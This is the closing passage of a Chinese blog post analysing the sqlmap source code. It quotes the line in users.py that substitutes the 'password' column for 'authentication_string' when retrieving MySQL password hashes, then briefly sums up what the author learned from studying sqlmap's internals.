<p>看下源码，然后找到了(sqlmap/plugins/generic/users.py):<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">values = inject.getValue(query.replace(&quot;authentication_string&quot;, &quot;password&quot;), blind=False, time=False)</span><br></pre></td></tr></table></figure></p>
<p>这里用replace将两个列明进行了替换，里面有个ifel的语句，要是第一次没找到就会进行替换，这样我们的问题就解决掉啦，sqlmap还是想的挺周全的哈哈。</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>sqlmap里面的内容实在是太多太多，想要摸索里面的内容需要花费大量的时间，当然收获也是成正比的，搞清楚sqlmap的原理，对我们sql注入技术会有很大的提升。</p>
<p>推荐阅读：<br><a href="https://www.anquanke.com/subject/id/160641" target="_blank" rel="noopener">sqlmap 内核分析系列</a></p>
<p>欢迎小伙伴们和我讨论sqlmap有关的任何问题。</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/26/58-spider/" rel="next" title="58爬虫租房信息">
                <i class="fa fa-chevron-left"></i> 58爬虫租房信息
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/01/一次sql注入bypass的思考/" rel="prev" title="一次sql注入bypass的思考">
                一次sql注入bypass的思考 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">sher10ck</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">35</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">8</span>
                    <span class="site-state-item-name">标签</span>
                  
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wulidecade.cn" title="https://wulidecade.cn" rel="noopener" target="_blank">Decade</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://mang0.me/" title="http://mang0.me/" rel="noopener" target="_blank">Mang0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.singll.cc/" title="https://blog.singll.cc/" rel="noopener" target="_blank">Singll</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://timeshu.github.io/" title="https://timeshu.github.io/" rel="noopener" target="_blank">Time</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hit0on.github.io/" title="https://hit0on.github.io/" rel="noopener" target="_blank">HitOn</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#测试方式"><span class="nav-number">1.</span> <span class="nav-text">测试方式</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#sqlmap的准备工作"><span class="nav-number">2.</span> <span class="nav-text">sqlmap的准备工作</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#sqlmap的注入分析"><span class="nav-number">3.</span> <span class="nav-text">sqlmap的注入分析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#sqlmap的一些参数"><span class="nav-number">4.</span> <span class="nav-text">sqlmap的一些参数</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#判断是否是dba权限"><span class="nav-number">4.1.</span> <span class="nav-text">判断是否是dba权限</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查询密码"><span class="nav-number">4.2.</span> <span class="nav-text">查询密码</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#总结"><span class="nav-number">5.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sher10ck</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> v6.7.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=6.7.0"></script>

  <script src="/js/src/motion.js?v=6.7.0"></script>



  
  

  
  <script src="/js/src/scrollspy.js?v=6.7.0"></script>
<script src="/js/src/post-details.js?v=6.7.0"></script>



  


  <script src="/js/src/bootstrap.js?v=6.7.0"></script>



  
  





  





  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
